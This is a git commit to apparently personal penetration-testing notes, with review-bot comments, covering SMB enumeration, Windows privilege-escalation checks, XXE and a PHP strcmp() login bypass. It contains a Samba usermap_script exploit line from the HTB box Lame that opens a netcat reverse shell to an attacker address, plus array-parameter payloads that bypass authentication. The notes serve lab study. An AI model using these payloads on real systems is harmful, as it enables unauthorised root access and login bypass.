smb exploit
This commit is contained in:
parent
a5b29def31
commit
24937f7d68
|
@ -1,3 +1,16 @@
|
|||
# SMB
|
||||
|
||||
## SMBClient
|
||||
|
||||
* Use `smbclient` to list the share
|
||||
```sh
|
||||
smbclient -L //$TARGET_IP/
|
||||
```
|
||||
* The protocol might be dated, try
|
||||
```sh
|
||||
smbclient -L //$TARGET_IP/ --option='client min protocol=NT1'
|
||||
```
|
||||
|
||||
# smbmap
|
||||
|
||||
* [Repo](https://github.com/ShawnDEvans/smbmap.git)
|
|
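Review bot: heading levels in this hunk are inconsistent: `# smbmap` is at the same level as the file title `# SMB`, while `## SMBClient` is a subsection; make it `## smbmap` so the tool sections line up. Also worth one clause on the `--option='client min protocol=NT1'` bullet: NT1 is SMBv1, which Samba disables by default because it is deprecated and insecure, so the flag is only a fallback for legacy hosts and a finding in its own right when it works.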
@ -70,3 +70,23 @@ wmic service get name,displayname,pathname,startmode | findstr /v /i "C:\Windows
|
|||
powershell "get-acl -Path 'C:\Program Files (x86)\System Explorer' | format-list"
|
||||
```
|
||||
|
||||
### Scheduled Services
|
||||
|
||||
* Check which services are scheduled via
|
||||
```sh
|
||||
schtasks
|
||||
```
|
||||
* Powershell's equivalent to scheduled tasks therefore is
|
||||
```sh
|
||||
ps
|
||||
```
|
||||
|
||||
## Files
|
||||
|
||||
### Group permissions
|
||||
|
||||
* Check modification permissions on files and if the current user is able to modify via
|
||||
```sh
|
||||
whoami /all
|
||||
icacls <filename>
|
||||
```
|
||||
|
|
|
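Review bot: the "Powershell's equivalent to scheduled tasks" bullet is wrong: `ps` in PowerShell is an alias for `Get-Process`, which lists running processes, not scheduled tasks; the counterpart to `schtasks` is `Get-ScheduledTask` (or `schtasks /query /fo LIST /v` for the verbose view). The section heading `### Scheduled Services` should also read `### Scheduled Tasks`, since the commands enumerate tasks, not services. Finally, the fences for `schtasks`, `whoami /all` and `icacls <filename>` are tagged `sh` although these are cmd/PowerShell commands; tag them `powershell` (or `cmd`) as the `wmic` and `get-acl` lines above do in context.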
@ -0,0 +1,11 @@
|
|||
# SMB Exploits
|
||||
|
||||
## usermap_script.rb
|
||||
|
||||
There can be a need to do manual exploitation for `Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution (Metasploit)` like the HTB box `Lame` shows.
|
||||
Since the automated exploit does not work, log in anonymously without an account and do the following
|
||||
```sh
|
||||
smb: \> logon "./=`nohup nc -e /bin/sh 10.10.17.20 4444`"
|
||||
```
|
||||
A connection to the root shell is provided.
|
||||
|
|
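Review bot: the reverse-shell line hardcodes `10.10.17.20 4444`; elsewhere in this repo targets are parameterised (`$TARGET_IP`), so use `$LHOST`/`$LPORT` placeholders here too so the note is reusable. The closing sentence "A connection to the root shell is provided" should say why it is root: the username map script is executed by `smbd`, so the command runs with the daemon's privileges, and it only arrives if a listener is already waiting on the chosen port. Also mention that the anonymous login requires a share with guest access, which is the Lame configuration the note relies on.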
@ -0,0 +1,20 @@
|
|||
# PHP strcmp() bypass
|
||||
|
||||
Given a `strcmp()` of a variable and a POST parameter value that looks like this
|
||||
```php
|
||||
[...]
|
||||
if (strcmp($username, $_POST['username']) == 0) {
|
||||
if (strcmp($password, $_POST['password']) == 0) {
|
||||
[...]
|
||||
```
|
||||
|
||||
If `$username` and `$password` are an array, sending a POST value as an array too will evaluate both `strcmp()` to 0.
|
||||
Using a Burpsuite Proxy, intercepting the HTTP request and changing the POST parameters from
|
||||
```http
|
||||
username=admin&password=admin
|
||||
```
|
||||
|
||||
to
|
||||
```http
|
||||
username[]=admin&password[]=admin
|
||||
```
|
|
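Review bot: the explanation in this hunk has the roles inverted: `$username` and `$password` are the server-side strings; it is the `$_POST['username']` / `$_POST['password']` values that the request turns into arrays with `username[]=admin&password[]=admin`. The bypass works because `strcmp()` given an array returns `NULL` with a warning, and `NULL == 0` is true under loose comparison; note that this is PHP 7 and earlier only, as PHP 8 throws a `TypeError` for an array argument. Worth adding the fix next to the bug: compare with `===` (or use `hash_equals()`) and reject non-string input with `is_string()`. Minor: "Burpsuite" should be "Burp Suite".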
@ -8,6 +8,7 @@ There are two types of XXE attacks: in-band and out-of-band (OOB-XXE).
|
|||
2. out-of-band XXE attacks (also called blind XXE), there is no immediate response from the web application and attacker has to reflect the output of their XXE payload to some other file or their own server.
|
||||
|
||||
## Document Type Definition (DTD)
|
||||
|
||||
A DTD defines the structure and the legal elements and attributes of an XML document.
|
||||
|
||||
* Example file content of `note.dtd`
|
||||
|
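Review bot: list item 2 needs a verb and an article to parse: "In out-of-band XXE attacks (also called blind XXE), there is no immediate response from the web application, and the attacker has to reflect the output of their XXE payload to some other file or to their own server." Since item 1 is outside this hunk, check that both items use the same sentence shape.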
@ -37,6 +38,7 @@ A DTD defines the structure and the legal elements and attributes of an XML docu
|
|||
```
|
||||
|
||||
## Replacing XML content
|
||||
|
||||
* Name in the example
|
||||
```xml
|
||||
<!DOCTYPE replace [<!ENTITY name "feast"> ]>
|
||||
|
|
|
@ -1,3 +1,4 @@
|
|||
# Miscellaneous References
|
||||
|
||||
## Static Binaries
|
||||
[andrew-d's statically compiles binary compilation](https://github.com/andrew-d/static-binaries.git)
|
||||
|
|
|
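Review bot: the link text "andrew-d's statically compiles binary compilation" is garbled; the repository is a collection of statically compiled binaries, so "andrew-d's collection of statically compiled binaries" matches what the URL points at.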
@ -2,6 +2,7 @@
|
|||
|
||||
[pentestmonkey's PHP Reverse Shell](https://github.com/pentestmonkey/php-reverse-shell.git)
|
||||
[ivak-sincek's php-reverse-shell](https://github.com/ivan-sincek/php-reverse-shell.git)
|
||||
[Impacket psexec.py](https://github.com/fortra/impacket/blob/master/examples/psexec.py)
|
||||
|
||||
## Generators
|
||||
|
||||
|
|
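Review bot: the link text "ivak-sincek's php-reverse-shell" misspells the author; the URL is `github.com/ivan-sincek/...`, so the text should read "ivan-sincek's php-reverse-shell". The new `## Generators` heading is added with no entries underneath it; either add the generator links in this commit or leave the heading out until there is content.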